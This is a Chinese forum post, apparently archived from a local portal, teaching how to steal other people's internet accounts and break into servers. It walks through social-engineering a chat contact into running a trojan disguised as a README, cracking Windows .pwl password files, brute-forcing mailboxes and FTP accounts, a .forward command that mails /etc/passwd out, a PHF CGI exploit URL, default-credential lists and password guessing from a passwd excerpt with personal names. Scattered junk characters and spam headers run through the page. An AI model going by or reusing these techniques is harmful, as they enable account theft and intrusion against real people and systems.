天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

    • 

    <delect id="ixd07"></delect>
      

      

      汶上信息港
      
標題: 如何得到別人的上網(wǎng)帳號和密碼 [打印本頁]
      

      
作者: 雜七雜八    時間: 2011-1-12 21:03
      
標題: 如何得到別人的上網(wǎng)帳號和密碼
      如何得到別人的上網(wǎng)帳號和密碼,我在這里介紹幾種弱智方法。
      
9 G1 a$ s! o: I' W方案一:利用特洛伊木馬得到帳號。必備工具:NTESPY、PWLVIEW。. ^* S7 i4 r- P' |' j( u+ k) [
      
優(yōu)點:只要對方運行了程序就有80%的成功率,而且不需要任何網(wǎng)絡入侵知識,只要能熟悉的操作上面兩個軟件即可。NETSPY是全中文軟件,一看就會。而PWLVIEW又是弱智操作只要在DOS下輸入PWLVIEW然后按回車即可。成功率高,操作簡單而且用不了多長時間是它最大的優(yōu)點,只是......6 C9 T7 k1 n2 M# ?/ Q( i& V
      
缺點:只有一個,那就是如何讓對方乖乖的運行你的程序。) h+ i/ O& R# ?
      
提示:先問清你的目標和你是不是在一個城市。0 u0 u5 I" q7 ^+ I+ e; G& u) q$ w" h
      
實戰(zhàn)演戲:一天,我在X海聊天室里尋找目標,遇見了同在北京的色鵝丟丟。我上前打招呼:丟丟好呀。丟丟說:你好呀。我又說:XXXXXXX(客套話,先和他拉關系)對了,我拿到了一個新程序,要不要看看?丟丟說:好呀,寄給我吧。
      
' L; J0 F6 G- t) [" I哈哈,魚上鉤了!先把誘餌程序改個名,如改成readme之類的東東,然后和一些不相干的東西發(fā)過去,然后你讓他先運行README。在這插一句,有一位大俠使用此法時,竟然把控制端程序和NETSPY的說明文件一起發(fā)了過去,真搞不懂他怎么想的。我對他說,你先運行README,是中文說明。丟丟說:好...咦,怎么沒反映呀?(YEAH!)我又說:那你直接運行軟件吧。丟丟說:好吧...不錯...我說:明天見...開始干活,連上他的機子后,現(xiàn)在C盤里找到了WIN95的目錄WINDOWS。也有可能是WIN95或WIN98,進入后查找*.pwl,然后把所有后綴名為PWL的文件都抓過來,放在你的工具PWLVIEW的子目錄里。在DOS窗口下輸入PWLVIEW然后敲回車,丟丟的上網(wǎng)帳號和密碼就都顯示出來了。而且以后如果他上網(wǎng),NETSPY就會通知你,他就再也逃不出你的手掌心了。就算是他換了密碼,你也能在2分鐘內(nèi)再把他搞定。1 r' j: v5 T2 d* X9 w
      
忠告:你用他的帳號上網(wǎng)后第一件事就是先去查看他的上網(wǎng)時間。分析一下他一般幾點上網(wǎng)以避免撞車。8 N! L9 k, {0 {1 I$ g: M) W% O% }
      
方案二:利用ISP的疏忽做文章舉。例用工具:EMAILCRK或網(wǎng)絡刺客' D1 O. W  |6 E
      
優(yōu)點:沒什么優(yōu)點2 n: M' N0 e' z
      
缺點:要具體情況具體對待,太麻煩
      
+ o  Z/ a4 W( q提示:平時多多留神。; G. {2 \8 G' s% |2 E
      
譬如,某個ISP給你開好了帳號,然后又畫蛇添足的給你一個郵箱,地址是:你的帳號@xxx.net" R; G! i  ^+ w4 i# J
      
密碼和你的上網(wǎng)密碼一樣。也就是說,只要你能敲開郵箱的密碼就一切OK了。% b& k+ c2 {0 W, x$ ?4 H
      
運行EMAILCRK或網(wǎng)絡刺客,套上字典后就等著。一般沒有XX個小時搞不定,不成功的可能性很大,而且破解時還必須要上網(wǎng)。你的機子要是快可以開上三四個窗口,套上不同的字典一起破
      
* ]5 J+ r- }6 z+ i% _方案三:侵入郵局主機然后把PASS檔抓回來,然后用JOHN或JACK套上字典開始破。) w( m) z% I: o. C" f
      
優(yōu)點:一次可以破出好多帳號,而且如果運氣好還能拿到ROOT,這個主機就要歸你控制了。而且破解時不用上網(wǎng),可以好幾臺機子一起破。
      
0 R. j" F# C6 U9 M0 w缺點:對于初學者有一定困難,尤其是只想拿一個上網(wǎng)帳號這樣做恐怕會得不償失。而且被發(fā)現(xiàn)的可能性很大,情節(jié)嚴重且性質(zhì)惡劣,一定要慎重對待。! m5 ]: x! i4 ], E) v* Z" {' ?
      
由于介紹此類的教學文章比較多,我就不班門弄斧了。 
      
: p! d% b$ U5 a/ b( z% Y( t
      
/ }7 q) I4 S9 j0 I哈哈,我來說說最簡單的入侵方法。其實入侵大體的原理相同,主要是利用系統(tǒng)的漏洞(BUG)來做文章。3 X6 J8 u2 {4 k6 U% F
      
只不過有的網(wǎng)站漏洞難找有的好找而已。一個好的黑客,就是要能很快的發(fā)現(xiàn)漏洞并加以利用。下面我給大家舉一個小栗子。* ?) G' S$ P+ P8 F; A
      
有一天,我去XX熱線申請主頁,發(fā)現(xiàn)那里采用的是機器自動回信,信的大概格式如下:1 s/ D8 u3 n* S4 [, N
      
0 A. c$ K) ?0 O/ B* h6 r+ k
      
------------------------------9 x3 H! T3 S) {$ o: _
      

      
6 [% m# h5 G+ s% ]7 aXXX,你好(XX是你在表格上填的名字)7 Q* @* U6 p* z0 U
      
你在XX熱線的主頁空間已開通
      
" ~9 M: [5 O  g) Y帳戶名:XXX 密碼:118 @4 }, C* T. t
      
-----------XX熱線
      
7 g" m7 R/ s7 p! z: T電話:XXXX-XXXXXXXX# [8 g8 l9 {/ S
      
------------------------------( r4 \- k$ P/ J4 Y
      
7 c& m$ k+ l: Q' ^1 |
      
好了,由于是機器回信,所以那里所有人的初始密碼都是11,而且該熱線要更改密碼要TELNET到郵局主機去改,有許多網(wǎng)友并沒有接觸過如何T主機,所以他們使用的還是初始密碼11。
      
0 @( H5 w7 \2 F. D% @開始干活了,打開FTP軟件,輸入XX熱線的IP,密碼11,然后挨個輸入帳戶名。帳戶名可去XX熱線的主頁空間列表里查看,先試試AAAA,。。。沒成功,再換一個,AABB。。。還是不行。哈哈,這個用戶名短,沒準能行。輸入AA。。。進去了。寄下用戶名然后繼續(xù)試,ABC。。。又成功了,看來沒改密碼的人很多呀。試幾個就行了,現(xiàn)在,你已經(jīng)擁有這些帳戶的控制權(quán)了。
      
2 f5 o6 i: h( z% w% b  C上面的這個栗子很簡單,一般象這么大的漏很難找。要侵入一個稍微象點話的站臺就要耗費你大量的時間和金錢,而且還未必能成功。即使成功了,你不改它實在無趣,改了恐怕會步馬X的后塵。此人侵入貴陽的主機并把界面換成了一張淫穢圖片。害的自己吃飯不用花錢了。所以我在這里勸大家一句,把這方面的精力放到全心全意為人民服務上去。實在不行就去聊天室,看誰不聽話就炸他,同樣很過癮的!  F- \4 I& q4 p- v1 G% M4 D
      
  
      
. D; t1 o0 Y- ~+ z& C
      
: G6 u/ q/ q# @( @0 m# D9 D                           如何獲得第一個帳號
      
5 K- K+ e. i8 t9 S) G8 u4 Y( F# ^; m) n% W- r0 U3 i1 v* n3 l: N
      
我們這種水平不高的黑客入侵都是先得到系統(tǒng)的一個有效帳號,進入后再利用系統(tǒng)BUG得到ROOT權(quán)限或想辦法得到SHADOW再解密.無論是利用系統(tǒng)漏洞還是得到SHADOW都是有一定規(guī)律可尋的,通常你到一些黑客站點找到對應系統(tǒng)相應版本的EXPLOIT編譯后執(zhí)行就行了.我感覺最困難的是獲得第一個有效的帳號,有時侯費盡力氣也得不到,后來總算是積累了一些經(jīng)驗,想寫出來和大家交流一下,希望能拋磚引玉,請高手們把更好的方法告訴我.) p" Y, W/ I8 c" b
      

      
8 f/ K, C# x3 l" o1 W6 K4 P* h確定了目標以后,我通常是先用匿名FTP去看一下,許多網(wǎng)站都開匿名FTP,帳號用ANONYMOUS或是FTP,密碼用一個EMAIL帳號(當然是假的),進入后到/etc目錄下把PASSWD拿回來,一般情況下都是一份很不全的名單,只有幾個系統(tǒng)帳號,那就算白來了:-}但有的時候會有比較傻的管理員把一些普通帳號放進去,這就是很重要的信息,雖然只有帳號沒有密碼,但畢竟邁出了第一步.如果FTP主目錄是drwxr-xr-x,做一個.foward文件傳上去,在UNIX下的命令應該是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后給匿名用戶寫一封信,它會把PASSWD發(fā)給你。
      
8 v1 K' ]; X) K2 n! B
      
: g6 V2 p) O$ P/ V如果目標沒有匿名FTP,就通過WWW訪問它的主頁,看看上面有什么信息,例如通過一些聯(lián)系人的EMAIL你就可以發(fā)現(xiàn)一些帳號,有的網(wǎng)頁上甚至列出了EMAIL通訊錄,這對黑客來講就是無價之寶.把這些帳號記下來,非常有用.
      
) |  i9 R! f. m. ~* O2 m5 L" ~: G6 ~: Q
      
以上幾個方法都不行的話,那就試試PHF查詢.在瀏覽器的地址欄輸入http://攻擊目標/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的話會顯示出PASSWD來,但是成功率極低:-< 
      
9 R0 p5 }! K$ t. b3 F# O; C; P# t' }! ]
      
, ?2 @/ W' i$ P. a' T' ^還可以利用目標的FINGER功能來積累帳號,如利用HAKTEK(一種掃描器)來監(jiān)視目標,一旦有人登陸該主機就會報告給你.但這種方法的缺點就是浪費時間,如果你是自己花錢上網(wǎng)的話可就要出血了!4 S# P+ F" ~9 n' J# x* x& X
      
' L& d. L! P" M) u+ ?9 g, @
      
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系統(tǒng)默認的帳號,例如:
      
9 z& y# q/ _( J% V
      
; _# Y' [4 j* \0 ^/ \帳號     密碼
      
7 T) L+ Y* V1 C. x1 K: v6 `' R. Q----------- ----------------
      
% ?. ?0 F7 ~" s! Oroot    root
      
3 _( I; y/ H$ gsys     sys/system/bin  I2 O; e% x8 R) z8 o8 {5 d. X, g
      
bin     sys/bin2 a! [: K, g6 S: e8 q- Y7 g
      
mountfsys  mountfsys
      
+ B: J0 g2 ]& e+ W: C# Dadm     adm
      
' G$ J& s& E5 K6 g; v/ Wuucp    uucp
      
6 g; A" y: e: B0 U" x$ p4 vnuucp    anon. ~- w$ O3 u+ s2 u, ^; C8 l! q0 Z
      
anon    anon
      
$ k& W) F. t2 \% f# buser    user
      
4 Z2 R9 F& U; \/ j( kgames    games( {: j+ |& \  N& o! N  [
      
install   install6 M; g( [; |# @8 a$ Z& `4 ^
      
reboot   給 "command login" 用的/ [5 U6 J+ {$ u8 J) c* t. S
      
demo    demo
      
, C! K, H: `7 l! U3 ]: W/ eumountfsys umountfsys
      
7 j# Q) a" q' M4 I1 D; Z2 `sync     sync
      
3 ^3 F1 P7 u5 x! ^1 badmin    admin
      
  d* d7 n: J7 Y6 h- `$ nguest    guest& q+ c1 o! q% i( _
      
daemon   daemon
      
/ X1 F' ^- a, u7 T$ `- w. q________________________________________________________________5 e5 a# V! N+ J6 u; r+ ~! Z
      

      
" B5 a4 U6 k" [7 O有些管理員忘記把他們改掉,那你就發(fā)財了!
      
  m' m" D% L( t
      
+ X6 Y) }+ D7 q& L( `! Z另外還有一些習慣性帳號如:test,www,html,web,oracle,setup,sybase,john,tom等也都應該試一試.
      
3 x% }# d2 e; |  x! ]$ ^0 S; y) w" S( Q5 V  d
      
只有帳號還不能進入系統(tǒng),但有了帳號搞密碼就容易一些了,主要辦法還是猜.如果是通過PASSWD知道帳號的那你應該會發(fā)現(xiàn)該用戶的許多信息,例如:
      
0 m* n! B2 [; y% ^/ ^! I3 S# G; R9 i
      
.........
      
3 Z1 B9 J9 v; j5 i
      
5 s" w) H) F1 ?xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh- r. A; r$ Z- j' z- e: T
      
3 I) Q0 G* X' P: I. h
      
qingyuan:x:275:50::/usr/qingyuan:/bin/sh
      
8 ^  Z9 L2 K- N. _3 E( J+ Y9 X9 S; N! w- d* ~
      
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
      
& O% j1 P; U  V0 y1 x+ i+ p2 a: v2 M$ D  R" O
      
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh# I, u, P2 q. I# H" u+ s2 v
      

      
$ R& e: J7 z' Z8 ?kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh( S+ ^4 @' v9 O" R
      
( F8 E) d9 v. N1 N6 C
      
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
      
3 v! b# K, M6 S6 I+ c! q3 N7 u% b, f2 |8 O( h2 A& f
      
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh" d: h( v. d3 \5 i8 Z
      
0 f4 H, N9 K, B2 I8 g
      
............8 \% @3 ]: R2 X: ]1 q
      
+ ?- w  Z- [0 F) [3 W& S) |
      
這是一部分PASSWD,從這兒我們可以得到七個帳號,注意每一行的第五項,那是該用戶的真實姓名,對!就用它來做密碼試.成功率還是比較高的.) p5 z/ p: b& S) \& D7 c0 T2 t6 e
      

      
/ X) y# |4 I: d+ V9 j5 j8 J5 k如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關信息.例如知道一個帳號support,我們就用網(wǎng)絡刺客II里的FINGER項來偵察support@xxx.xxx.xxx會獲得很多該帳號的信息例如真名實姓,電話號碼等就用這些做密碼來猜">如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關信息.例如知道一個帳號support,我們就用網(wǎng)絡刺客II里的FINGER項來偵察support@xxx.xxx.xxx會獲得很多該帳號的信息例如真名實姓,電話號碼等就用這些做密碼來猜.
      
7 A' n3 F( J! O4 L
      
1 G6 k  G. W! h' t; c* m# U0 w: z! `5 A當然最可能的密碼還是帳號本身和一些帳號的變形,如帳號是john,密碼可能是nhoj,john123,john888等.或是一些簡單數(shù)字.總之是要費一番工夫來猜的.! b  L" R4 v' w' ^
      
( b$ [8 F) F) w4 U4 C
      
如果還猜不出密碼,只好用LETMEIN之類的東西來猜,字典一定要好.否則,你的電話費就要.....而且這種方法比較危險,還是不用為好.
      
2 o# ]2 |. z: d7 d& z  P  |
      
& y/ I- r$ {3 h; ?8 @6 R1 t最后實在不行還有一種比較卑劣的手段,就是給該網(wǎng)站的網(wǎng)管寫封信,想辦法騙他執(zhí)行特洛伊木馬,然后再.......算了,不說了.
      
1 K; d7 @: {0 y+ `2 o5 u, `/ Q# }! q& ?9 \" \$ Q
      
你可能發(fā)現(xiàn)以上這些方法都不能百分之百的成功,或者說成功率是比較低的,因為我也不知道更好的方法.但我感到一定有一種更好的方法,希望有高手見到此文能告訴我.$ Y* Y, Z% l# Y* T: A- \
      

      
, A1 K9 l. @  U5 L, P  e




      

      

      歡迎光臨 汶上信息港 (http://www.vancelump.com/)

Powered by Discuz! X3.5